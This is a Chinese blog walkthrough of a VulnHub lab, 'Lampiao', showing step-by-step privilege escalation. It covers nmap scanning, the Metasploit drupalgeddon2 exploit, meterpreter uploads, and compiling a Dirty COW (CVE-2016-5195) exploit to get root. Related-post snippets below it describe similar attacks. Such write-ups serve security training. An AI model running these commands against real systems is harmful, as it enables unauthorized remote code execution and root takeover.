Linux脏牛漏洞提权

最新推荐文章于 2024-06-05 11:28:52 发布
最新推荐文章于 2024-06-05 11:28:52 发布
阅读量1.3k 收藏 12
点赞数 3
分类专栏: 提权 MSF KALI 文章标签: 安全 linux 提权 脏牛漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/125860869
版权
KALI 同时被 3 个专栏收录
28 篇文章 6 订阅
订阅专栏
MSF
21 篇文章 6 订阅
订阅专栏
提权
3 篇文章 0 订阅
订阅专栏

通过vulnhub平台搭建靶场

靶机地址:Vulnerable By Design - Search: lampiao ~ VulnHub

靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip

下载完成后,双击Lampiao.ovf运行

启动靶机后,默认是不给用户名、密码和IP地址的

通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描

nmap扫描192.168.200.0/24

首先我们使用nmap的sP参数通过ping探测已存活的主机

nmap -sP 192.168.200.0/24

扫描192.168.200.152的端口

nmap -p1-65535 192.168.200.152

访问192.168.200.152:1898

启动msf,通过msf搜索所有关于Drupal的漏洞

使用exploit/unix/webapp/drupal_drupalgeddon2

show options查看所需参数

设置目标地址和目标端口

set rhost 192.168.200.152

set rport 1898

exploit进行攻击,并返回meterpreter会话

查看当前用户为www-data

上传漏洞收集脚本到目标主机赋予执行权限并执行

下载地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh

进入目标主机的/tmp目录,查看上传的1.sh是否存在

赋予1.sh执行权限

chmod +x 1.sh

运行1.sh,发现该靶机存在脏牛漏洞 

上传漏洞收集脚本到目标主机赋予执行权限并执行

exp下载地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master

退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址

upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp

进入shell交互,编译exp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

开启py终端,运行./dcow,获取密码

python -c 'import pty; pty.spawn("/bin/bash")'

登录root用户,查看当前权限

用户名:root

密码:dirtyCowFun

bbb07
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux利用脏牛漏洞提权
cxrpty的博客
03-10 5773
实验环境:Centos6.5、ssh、 实验步骤: 一、搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...
脏牛提权(靶机复现)
tubug的博客
03-26 2114
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 2970
对CVE-2016-5159提权的保姆级的教程
linux提权脏牛CVE-2016-5195-
最新发布
aaaaaadvszv的博客
06-05 144
lutil:链接 libutil 库。这对于使用多线程的程序是必要的。1.利用nmap查看你217网段下的开放端口,发现217.147开放80端口。-pedantic:更严格地遵循标准,发现一些非标准的用法。-std=c++11:使用 C++11 标准进行编译。g++:GNU 编译器集合中的 C++ 编译器。-odcow:指定输出文件的名称为 dcow。-O2:启用优化级别 2,进行中级优化。6.赋予执行权限,执行脚本进行漏洞检测。-Wall:启用所有常见的警告信息。dcow.cpp:源代码文件的名称。
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 3055
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞
vulnhub--lampiao脏牛提权
鲨鱼辣椒的博客
08-03 4465
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
linux利用脏牛提权
a1262443306的博客
04-18 1213
Linux利用脏牛漏洞提权: 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow) ​ 本主机:kali ip: 192.168.223.129 ​ 目标机:ubuntu ip:192.168.223.128 ​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接 打开虚拟终端: 2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
dirtycow脏牛linux提权exp
03-25
这个漏洞利用了Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
xss、脏牛提权.zip
06-18
脏牛漏洞(Dirty COW)是Linux系统中的一个严重权限提升漏洞,其全称为"Copy-on-Write",即写时复制。这个漏洞允许一个普通用户获得root权限,从而能够执行任意代码,危害极大。脏牛漏洞源于Linux内核的内存管理机制...
dirtycow提权漏洞原理图
03-10
自己画的关于脏牛漏洞提权的原理图,个人感觉比较清晰,适合小白理解用
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
在本文中,我们将深入探讨Linux系统中的权限提升,特别是通过利用Linux脏牛内核漏洞、SUID权限以及信息收集来实现这一目标。这些技术在网络安全领域非常重要,因为它们可以帮助安全研究人员发现并修复潜在的安全漏洞...
Linux提权脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1550
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
Linux提权脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
linux提权之dirtycow
qq_62370574的博客
01-20 1029
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
脏牛提权及交互shell
weixin_43047908的博客
07-03 2548
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞脏牛漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
Linux SUID提权&脏牛提权
m0_65096687的博客
05-24 948
设置了SUID后,文件启动的时候就会以root的权限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root权限去运行它。SUID Files 还有一个 Possible interserting SUID files。全部的SUID文件和一个可能可以利用的SUID文件。连接上来后把漏洞检测的脚本上传至tmp目录运行。这是利用find手动查找有SUID文件的命令。这里不知道啥原因,反弹的shell还是yx。然后我们就要观察文件中是否存在以下文件。我们就利用find进行SUID提权
脏牛提权靶机
m0_73482536的博客
05-10 224
练习的靶机
linux远程脏牛提权
06-11
"脏牛"漏洞Linux内核中的一个本地提权漏洞,攻击者可以利用该漏洞在受害者系统上获得root权限。如果您想要远程利用该漏洞进行提权,需要首先在目标系统上获取访问权限。 一种方法是使用SSH连接到目标系统,然后执行利用脏牛漏洞的攻击代码。攻击代码可以是已经编写好的工具,也可以是自己编写的脚本。 请注意,利用脏牛漏洞进行攻击是非法的,可能会导致严重后果。建议您遵守法律法规并避免进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值